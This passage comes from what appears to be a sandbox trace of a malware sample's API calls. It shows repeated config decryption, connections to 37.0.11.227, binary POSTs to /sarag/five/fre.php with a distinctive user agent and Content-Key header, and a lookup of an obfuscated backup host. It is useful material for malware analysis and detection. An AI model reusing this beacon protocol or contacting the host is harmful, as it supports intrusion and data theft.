pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0294.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.766] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0294.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.767] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0294.767] GetProcessHeap () returned 0x690000 [0294.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0294.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.768] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0294.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.773] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0294.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.774] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0294.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.775] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0294.775] GetProcessHeap () returned 0x690000 [0294.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0294.776] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0294.776] GetProcessHeap () returned 0x690000 [0294.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0294.776] socket (af=2, type=1, protocol=6) returned 0x980 [0294.777] connect (s=0x980, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0294.808] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0294.808] GetProcessHeap () returned 0x690000 [0294.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0294.808] GetProcessHeap () returned 0x690000 [0294.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0294.809] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0294.810] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0294.810] GetProcessHeap () returned 0x690000 [0294.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0294.810] GetProcessHeap () returned 0x690000 [0294.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0294.811] GetProcessHeap () returned 0x690000 [0294.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0294.811] GetProcessHeap () returned 0x690000 [0294.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0294.812] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0294.815] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0294.815] GetProcessHeap () returned 0x690000 [0294.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0294.815] GetProcessHeap () returned 0x690000 [0294.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0294.816] send (s=0x980, buf=0x6ad508*, len=242, flags=0) returned 242 [0294.816] send (s=0x980, buf=0x6aba40*, len=159, flags=0) returned 159 [0294.816] GetProcessHeap () returned 0x690000 [0294.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0294.817] recv (in: s=0x980, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0294.949] GetProcessHeap () returned 0x690000 [0294.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0294.950] GetProcessHeap () returned 0x690000 [0294.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0294.951] GetProcessHeap () returned 0x690000 [0294.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0294.951] GetProcessHeap () returned 0x690000 [0294.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0294.952] closesocket (s=0x980) returned 0 [0294.956] GetProcessHeap () returned 0x690000 [0294.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0294.956] GetProcessHeap () returned 0x690000 [0294.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0294.957] GetProcessHeap () returned 0x690000 [0294.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0294.957] GetProcessHeap () returned 0x690000 [0294.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0294.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f8) returned 0x980 [0294.961] Sleep (dwMilliseconds=0xea60) [0294.965] GetProcessHeap () returned 0x690000 [0294.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0294.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0294.982] GetProcessHeap () returned 0x690000 [0294.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0294.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.993] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0294.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.994] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.997] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.998] GetProcessHeap () returned 0x690000 [0294.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0295.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.001] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0295.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.003] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.004] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0295.007] GetProcessHeap () returned 0x690000 [0295.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.009] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.010] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.013] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.013] GetProcessHeap () returned 0x690000 [0295.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0295.013] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.013] GetProcessHeap () returned 0x690000 [0295.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0295.014] GetProcessHeap () returned 0x690000 [0295.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.014] GetProcessHeap () returned 0x690000 [0295.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0295.015] GetProcessHeap () returned 0x690000 [0295.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0295.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.020] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0295.051] GetProcessHeap () returned 0x690000 [0295.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0295.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.052] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.056] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.057] GetProcessHeap () returned 0x690000 [0295.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0295.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.062] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0295.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.063] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.067] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0295.067] GetProcessHeap () returned 0x690000 [0295.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.069] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0295.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.070] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0295.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.072] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0295.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0295.073] GetProcessHeap () returned 0x690000 [0295.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.073] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0295.073] GetProcessHeap () returned 0x690000 [0295.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0295.073] socket (af=2, type=1, protocol=6) returned 0x984 [0295.074] connect (s=0x984, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0295.108] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0295.108] GetProcessHeap () returned 0x690000 [0295.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0295.108] GetProcessHeap () returned 0x690000 [0295.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0295.110] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.111] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.111] GetProcessHeap () returned 0x690000 [0295.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0295.111] GetProcessHeap () returned 0x690000 [0295.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.112] GetProcessHeap () returned 0x690000 [0295.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0295.112] GetProcessHeap () returned 0x690000 [0295.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0295.113] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.114] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.114] GetProcessHeap () returned 0x690000 [0295.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0295.114] GetProcessHeap () returned 0x690000 [0295.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.122] send (s=0x984, buf=0x6ad508*, len=242, flags=0) returned 242 [0295.123] send (s=0x984, buf=0x6aba40*, len=159, flags=0) returned 159 [0295.123] GetProcessHeap () returned 0x690000 [0295.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0295.123] recv (in: s=0x984, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0295.193] GetProcessHeap () returned 0x690000 [0295.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0295.193] GetProcessHeap () returned 0x690000 [0295.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0295.194] GetProcessHeap () returned 0x690000 [0295.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0295.194] GetProcessHeap () returned 0x690000 [0295.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0295.195] closesocket (s=0x984) returned 0 [0295.195] GetProcessHeap () returned 0x690000 [0295.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0295.195] GetProcessHeap () returned 0x690000 [0295.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.196] GetProcessHeap () returned 0x690000 [0295.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0295.196] GetProcessHeap () returned 0x690000 [0295.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0295.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17fc) returned 0x984 [0295.200] Sleep (dwMilliseconds=0xea60) [0295.202] GetProcessHeap () returned 0x690000 [0295.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0295.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.203] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.210] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0295.221] GetProcessHeap () returned 0x690000 [0295.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0295.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.225] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.233] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.237] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.237] GetProcessHeap () returned 0x690000 [0295.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0295.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.239] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0295.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.240] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.241] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0295.241] GetProcessHeap () returned 0x690000 [0295.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.242] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.243] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.244] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.249] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.249] GetProcessHeap () returned 0x690000 [0295.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0295.249] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.249] GetProcessHeap () returned 0x690000 [0295.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0295.250] GetProcessHeap () returned 0x690000 [0295.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.250] GetProcessHeap () returned 0x690000 [0295.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0295.250] GetProcessHeap () returned 0x690000 [0295.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0295.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0295.264] GetProcessHeap () returned 0x690000 [0295.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0295.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.265] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.266] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.269] GetProcessHeap () returned 0x690000 [0295.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0295.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.271] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0295.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.272] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.273] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0295.273] GetProcessHeap () returned 0x690000 [0295.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.274] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0295.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0295.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0295.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0295.276] GetProcessHeap () returned 0x690000 [0295.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0295.277] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", 